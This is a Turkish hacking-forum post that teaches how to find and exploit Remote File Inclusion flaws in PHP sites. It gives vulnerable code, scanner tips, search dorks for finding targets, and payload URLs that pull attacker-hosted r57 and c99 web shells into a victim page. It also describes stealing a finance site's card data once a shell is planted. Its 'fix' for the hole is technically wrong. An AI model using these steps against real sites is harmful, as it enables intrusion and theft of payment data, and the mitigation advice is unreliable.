THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

RFı açığı manuel bulma

PYRITHIONEs - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
2.321
Konular:
247
Teşekkür (Etti):
598
Teşekkür (Aldı):
668
Ticaret:
(0) %
13-06-2013 19:34
#1
Thumbs up
RFı açığı manuel bulma
Rfi Açığı Manuel Bulma
________________________________________

Rfi Açığı Manuel Bulma

# )RFI Nedir?
# )Nasıl Bulunur?/Nasıl Shell Dahil Edilir/Sokulur?
# )RFI Açığının Bir Dorku Varmıdır?
# )ve Sonrası...

Başlıyoruz;

RFI Açıkları Günümüzde Pek Rastlanmasada Her an Karşımıza Çıkabilecek Bir Saldırı Türüdür.

RFI Açığının Mantığı Uzaktan Dosta Dahil Etmektir.

Günümüzde RFI Açığı Basit Bir Açık Olarak Bilinir.Ama Basit Olduğu Kadar da Çok Tehlikelidir.

Bir Web Sayfası Düşünün ve Bu Web Sayfası PHP Diliyle Kodlanmış Olsun.Eğer Sayfayı Kodlayan Tasarımcı Acemi ise Hata Yapması Kaçınılmazdır.

Lafı fazla uzatmattım heralde.Hemen Konuya Dönelim.

RFI Nedir?

RFI (Remote File İnclude), Türkçesi Uzaktan Dosya Dahil Etme Anlanmına Gelmektedir.

Nasıl Bulunur?

1-) Hedef Sitenin Scriptini İndirerek RFI Açığı Aranabilir

2-) Hedef Siteyi Scanner ile Tarayarak RFI Açığı Bulunabilir.

2-) Hedef Site Üzerinde Manuel Olarak Aranarak RFI Açığı Bulunabilir.

-----------------------------------------------------------------------------------------------------

1-) Hedef Sitenin Scriptinde RFI Açığı Aramak.

İndirdiğiniz Scriptin PHP İle Kodlandığını Varsayalım.RFI Taracağımız Dosyanın adı rfiscript.php olduğunu var sayıyoruz.

Kod:
<?php

include ($degisken. ’../function.php’);

?>
Bu Scriptte RFI Açığı Olduğunu Anlarız.Bu Scripti Bulduğumuz Sitede Açık Tarayabiliriz.Peki bu Açığı Nasıl Kaparız.?

Kod:
<?php

$degisken = ’data’;

include ($degisken. ’../function.php’);

?>

Açığı bu şekilde kapatırız.Ne Yaptık;

Sistemde kullanılmayan bir degisken isimile degişkene deger verdik.Hacker bu sayfada RFI Açığı tarattığında RFI Açığı bulamayacaktır..RFI Açığının bulunmasını engelledik..

2-) Hedef Siteyi Scanner Programları ile Tarayarak RFI Açığı Bulma.

Hedef Sitemizin Adı www.xxx.com olsun.Biz bu sitede RFI Açığının olup olmadığını anlamaya çalışacağız.Şimdi bir Web Security Scanner programı ile hedef sitemizi tarayacağız.Ben Örnek olsun diye bir program ismi veriyim.

Acunetix Web Vulnerability Scanner.Türkçesi Acunetix Web Güvenlik Açığı Tarayayıcısı gibi bişey. İngilizcem pek kuvvetli degildir.

Programımızla hedef sitemizi tarattığımızda sitede RFI Açığı olup olmadığınız zaten uyarı olarak size verecektir.Ama ben programla açık taratma taraftarı degilim.Çünkü bu işi siz ögreneceksiniz program degil..

2-) Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak.

Şimdi size tekrar hedef sitemiz olan www.xxx.com üzerinden manuel açık tarayamayı anlatacağım.

Sitemizde bir id değeri ararız.Buldugumuz id değerinde RFI açığı tararız.Nasılmı?

www.xxx.com/sayfa.php?id=1

Gerekli olan bir şey daha belirteyim.Kendi hostunuza atılmış bir txt uzantılı shell..Oda www.sitemiz.com/r57shell.txt?

Şimdi hedef sitemizdeki id değerinin sonundaki rakam/harf/karakter herneyse siliyoruz ve kendi sitemizdeki txt uzantılı shell adresini yazıyoruz.

http://www.xxx.com/sayfa.php?id=http.../r57shell.txt?

ekrana r57shellimiz yansır ise bir RFI Açığı bulmuşsunuz demektir.Bir Screnn ile anlatayım bunu; (Shell yansıması)

Bu resim otomatik olarak küçültülmüştür. Resmin tam görünümü için tıklayın. Orjinal resim boyutu 993x838.
This image has been resized. Click this bar to view the full image. The original image is sized 993x838.


Evet.Bu şekilde bir Shell yansıması olur ise hedef siteye shell sokulmuş demektir.

RFI Açığının Bir Dorku Varmıdır?

RFI Açığının belirli bir dorku yoktur.PHP ve ASP vs vs sayfalarda olabilir.Şimdi ben buraya binlerce dork yazabilirim ama zamanımız kısıtlı bu yüzden bir kaç örnek dork vereyim.

inurl:"page?id="

inurl:"open?id="

inurl:"go?id="

ve Sonrası...

Evet arkadaşlar.Bakalım neler öğrenmişiz ve daha neler yapabiliriz;

RFI’ın ne olduğunu, Açığı nasıl bulunacağını,Scriptte nasıl tespit edilin nasıl kapatılacağını, bulduğumuz açığı kullanıp nasıl shell sokabileceğimizi ve belli başlı RFI Dorklarını öğrendik.Şimdi gelin bu shell soktuğumuz siteye neler yapılabileceğine bakalım.

Sitemiz bir Finans sitesi olsaydı, Sitedeki Database bilgilerini çeker Tüm KrediKartları, Banka kartları vs bilgileri çekebilirdik.

Hack The WebSite By RFI W1n_h4ck3r - YouTube



Facebook sayfamızı beğenin.




RFI
1- Remote File İnclude Nedir?

RFI(Remote File İnclude) Uzakdan dahil etmek anlamına gelir.Eskisi kadar olmasa da şuanda mevcut olan siteler var..


2- Remote File İnclude Mantığı Nedir?

Mantığı açık bulduğumuz siteye istediğimiz sitedeki bir dosyayı dahil etmektir.

3- Saldırı Anı (Açığın Tespiti - Açığın Kullanımı - Aksi Halde Bypass)

Bir web sitesi düşünün ; www.site.com/dosya.php?id=2 olsun.İd= değerinden sonraki 2 yi siliyoruz;
www.site.com/dosya.php?id= oluyor.Şimdi burada açık olup olmaığını nasıl anlarız?
Bir host’a dosyanızı txt uzantılı olarak atın.Daha sonra sitede ; http://www.site.com/dosya.php?id=htt...m.com/c99.txt? şeklinde çağırın.Eğer sayfada çağırdığınız dosya çalıştıysa açığı hem bulmuş hemde hazır hale getirmiş oluyorsunuz zaten..

4- Remote File İnclude Nerelerde Tespit Edilebilir?

a-Search kutusu
Bir Search (Arama) düşünün ;



Şeklinde..Buraya http://site.com/c99.txt? şeklinde dosyanızın adresini txt uzantılı yazıp ara butonuna tıkladığınızda, eğer karşınıza dosya geliyorsa , yani çağırdığınız dosya, burada RFI Açığı mevcuttur.Bu kadar basittir.
Konu alıntıdır.
ipinsan Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler